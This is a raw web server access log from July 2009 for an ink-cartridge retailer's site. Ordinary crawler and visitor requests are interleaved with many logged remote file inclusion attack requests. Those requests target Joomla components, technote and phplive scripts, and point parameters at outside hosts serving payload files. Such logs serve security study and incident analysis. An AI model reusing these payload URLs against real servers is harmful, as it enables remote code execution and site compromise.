65.254.39.210 - - [01/Jul/2009:06:47:27 -0700] "GET /logs/scripts.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "site.inkjetcartridge.com"
213.198.4.181 - - [01/Jul/2009:06:48:58 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "site.inkjetcartridge.com"
213.198.4.181 - - [01/Jul/2009:06:48:58 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "site.inkjetcartridge.com"
213.198.4.181 - - [01/Jul/2009:06:48:58 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:06:49:41 -0700] "GET /email/?D=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
195.149.74.81 - - [01/Jul/2009:06:51:08 -0700] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
195.149.74.81 - - [01/Jul/2009:06:51:08 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
195.149.74.81 - - [01/Jul/2009:06:51:08 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:06:54:41 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:06:54:41 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:06:54:41 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "site.inkjetcartridge.com"
91.192.20.164 - - [01/Jul/2009:06:55:50 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
91.192.20.164 - - [01/Jul/2009:06:55:50 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
91.192.20.164 - - [01/Jul/2009:06:55:51 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:06:57:52 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:06:57:52 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:06:57:55 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "site.inkjetcartridge.com"
65.55.51.69 - - [01/Jul/2009:06:59:35 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:07:00:39 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:07:00:40 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:07:00:43 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:07:02:30 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:07:02:30 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:07:02:30 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
83.98.209.71 - - [01/Jul/2009:07:11:46 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.27.67 - - [01/Jul/2009:07:14:06 -0700] "GET /logs/access.log//technote7//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.27.67 - - [01/Jul/2009:07:14:07 -0700] "GET /logs//technote7//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.27.67 - - [01/Jul/2009:07:14:07 -0700] "GET /technote7//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:07:16:53 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:07:16:54 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.77.32.217 - - [01/Jul/2009:07:16:55 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
91.192.20.164 - - [01/Jul/2009:07:22:00 -0700] "GET /logs/scripts.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
77.88.30.248 - - [01/Jul/2009:07:30:17 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yandex/1.01.001 (compatible; Win16; I)" "site.inkjetcartridge.com"
38.98.120.85 - - [01/Jul/2009:07:31:45 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "ShopWiki/1.0 ( +http://www.shopwiki.com/wiki/Help:Bot)" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:07:34:09 -0700] "GET /phpbb/posting.php?mode=reply&t=1563 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
173.67.215.142 - - [01/Jul/2009:07:35:56 -0700] "GET /images/brother-mfc-5460cn.jpg HTTP/1.1" 200 20615 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "site.inkjetcartridge.com"
173.67.215.142 - - [01/Jul/2009:07:35:56 -0700] "GET /images/epson-c88.jpg HTTP/1.1" 200 6555 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "site.inkjetcartridge.com"
173.67.215.142 - - [01/Jul/2009:07:35:56 -0700] "GET /images/epson-r2400.jpg HTTP/1.1" 200 3335 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "site.inkjetcartridge.com"
173.67.215.142 - - [01/Jul/2009:07:35:56 -0700] "GET /images/brother-mfc-240cn.jpg HTTP/1.1" 200 23620 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "site.inkjetcartridge.com"
173.67.215.142 - - [01/Jul/2009:07:35:56 -0700] "GET /images/canon-pixma-pro9000.jpg HTTP/1.1" 200 24854 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "site.inkjetcartridge.com"
173.67.215.142 - - [01/Jul/2009:07:35:56 -0700] "GET /images/brother-mfc-885cw.jpg HTTP/1.1" 200 27931 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "site.inkjetcartridge.com"
173.67.215.142 - - [01/Jul/2009:07:35:56 -0700] "GET /images/canon-pixma-ip4500.jpg HTTP/1.1" 200 28688 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "site.inkjetcartridge.com"
173.67.215.142 - - [01/Jul/2009:07:35:56 -0700] "GET /images/hp-laserjet3050.jpg HTTP/1.1" 200 19965 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "site.inkjetcartridge.com"
65.55.106.137 - - [01/Jul/2009:07:37:16 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:07:47:11 -0700] "GET /phpbb/viewtopic.php?t=490 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
124.32.56.166 - - [01/Jul/2009:08:02:07 -0700] "GET /phplive/setup/header.php?css_path=http://haruuu.com/id.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
76.88.64.238 - - [01/Jul/2009:08:02:41 -0700] "GET /email/images/inkmail13_02.gif HTTP/1.1" 200 16093 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; WWTClient2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSN Optimized;US)" "site.inkjetcartridge.com"
76.88.64.238 - - [01/Jul/2009:08:02:41 -0700] "GET /email/images/inkmail13_05.gif HTTP/1.1" 200 14099 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; WWTClient2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSN Optimized;US)" "site.inkjetcartridge.com"
67.169.140.15 - - [01/Jul/2009:08:04:39 -0700] "GET /email/images/inkmail2_01.gif HTTP/1.1" 200 7881 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
67.169.140.15 - - [01/Jul/2009:08:04:39 -0700] "GET /email/images/inkmail2_02.gif HTTP/1.1" 200 16031 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
67.169.140.15 - - [01/Jul/2009:08:04:40 -0700] "GET /email/images/inkmail2_04.gif HTTP/1.1" 200 17259 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
67.169.140.15 - - [01/Jul/2009:08:04:40 -0700] "GET /email/images/inkmail2_05.gif HTTP/1.1" 200 14965 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:08:17:52 -0700] "GET /phpbb/viewtopic.php?p=2362 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:08:33:22 -0700] "GET /phpbb/viewtopic.php?p=374 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
72.30.142.173 - - [01/Jul/2009:08:38:29 -0700] "GET /phpbb/viewtopic.php?t=1204 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
114.200.199.144 - - [01/Jul/2009:08:40:19 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
114.200.199.144 - - [01/Jul/2009:08:40:19 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
114.200.199.144 - - [01/Jul/2009:08:40:19 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 200 1230 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.79.200 - - [01/Jul/2009:08:41:28 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.79.200 - - [01/Jul/2009:08:41:28 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 200 1230 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.79.200 - - [01/Jul/2009:08:41:28 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 200 2132 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:08:47:38 -0700] "GET /phpbb/viewtopic.php?p=463 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
110.45.138.139 - - [01/Jul/2009:08:48:12 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
210.110.97.12 - - [01/Jul/2009:08:49:11 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "site.inkjetcartridge.com"
114.200.199.144 - - [01/Jul/2009:08:50:41 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
65.55.106.213 - - [01/Jul/2009:09:01:35 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
69.249.95.106 - - [01/Jul/2009:09:03:45 -0700] "GET /email/images/inkmail13_04.gif HTTP/1.1" 200 17176 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko)" "site.inkjetcartridge.com"
69.249.95.106 - - [01/Jul/2009:09:03:45 -0700] "GET /email/images/inkmail13_01.gif HTTP/1.1" 200 6009 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko)" "site.inkjetcartridge.com"
198.85.228.97 - - [01/Jul/2009:09:04:50 -0700] "GET /email/images/inkmail13_03.gif HTTP/1.1" 200 15936 "http://mail.google.com/mail/?ui=2&view=bsp&ver=1qygpcgurkovy" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "site.inkjetcartridge.com"
198.85.228.97 - - [01/Jul/2009:09:04:50 -0700] "GET /email/images/inkmail13_04.gif HTTP/1.1" 200 17176 "http://mail.google.com/mail/?ui=2&view=bsp&ver=1qygpcgurkovy" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:09:06:27 -0700] "GET /links/links4.html HTTP/1.0" 200 27407 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
65.55.107.182 - - [01/Jul/2009:09:06:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
110.45.138.139 - - [01/Jul/2009:09:06:52 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
110.45.138.139 - - [01/Jul/2009:09:06:53 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
110.45.138.139 - - [01/Jul/2009:09:06:54 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
210.110.97.12 - - [01/Jul/2009:09:13:36 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "site.inkjetcartridge.com"
110.45.138.139 - - [01/Jul/2009:09:17:36 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
210.110.97.12 - - [01/Jul/2009:09:21:06 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "site.inkjetcartridge.com"
210.110.97.12 - - [01/Jul/2009:09:21:06 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "site.inkjetcartridge.com"
210.110.97.12 - - [01/Jul/2009:09:21:07 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:09:21:24 -0700] "GET /phpbb/viewtopic.php?t=851 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
114.200.199.144 - - [01/Jul/2009:09:25:12 -0700] "GET /logs/access.log%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
114.200.199.144 - - [01/Jul/2009:09:25:12 -0700] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
114.200.199.144 - - [01/Jul/2009:09:25:12 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:09:31:47 -0700] "GET /phpbb/viewtopic.php?p=1417 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
222.73.17.7 - - [01/Jul/2009:09:32:06 -0700] "GET /logs/scripts.log//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
72.30.142.250 - - [01/Jul/2009:09:32:09 -0700] "GET /phpbb/viewtopic.php?t=909 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
222.73.17.7 - - [01/Jul/2009:09:32:28 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
222.73.17.7 - - [01/Jul/2009:09:32:30 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
222.73.17.7 - - [01/Jul/2009:09:32:32 -0700] "GET /include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
